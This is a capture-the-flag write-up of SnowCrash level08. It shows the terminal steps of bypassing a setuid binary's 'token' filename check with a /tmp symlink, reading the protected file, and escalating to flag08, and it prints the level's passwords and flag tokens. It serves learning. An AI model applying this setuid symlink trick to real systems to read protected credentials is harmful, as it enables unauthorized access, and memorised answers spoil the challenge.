# in this level we have two files:
level08@SnowCrash:~$ ls -l
total 16
-rwsr-s---+ 1 flag08 level08 8617 Mar  5  2016 level08
-rw-------  1 flag08 flag08    26 Mar  5  2016 token

level08@SnowCrash:~$ file level08
level08: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xbe40aba63b7faec62e9414be1b639f394098532f, not stripped

# level08 is an executable whose owner is flag08, let's run it

level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 file
level08: Unable to open file: No such file or directory
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
level08@SnowCrash:~$ ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                                                                                   = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)                                                               = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++

# it seems the program opens the given file and outputs its content to the console
# but token cannot be accessed because of strstr("token", "token")
# let's create then a symbolic link to 'token' in /tmp whose name doesn't include 'token'

level08@SnowCrash:~$ ln -s ~/token /tmp/sl
level08@SnowCrash:~$ ./level08 /tmp/sl
quif5eloekouj29ke0vouxean
level08@SnowCrash:~$ su flag08
Password: 
Don't forget to launch getflag !
flag08@SnowCrash:~$ getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
flag08@SnowCrash:~$ su level09
Password: 
level09@SnowCrash:~$ 

# level09 unlocked
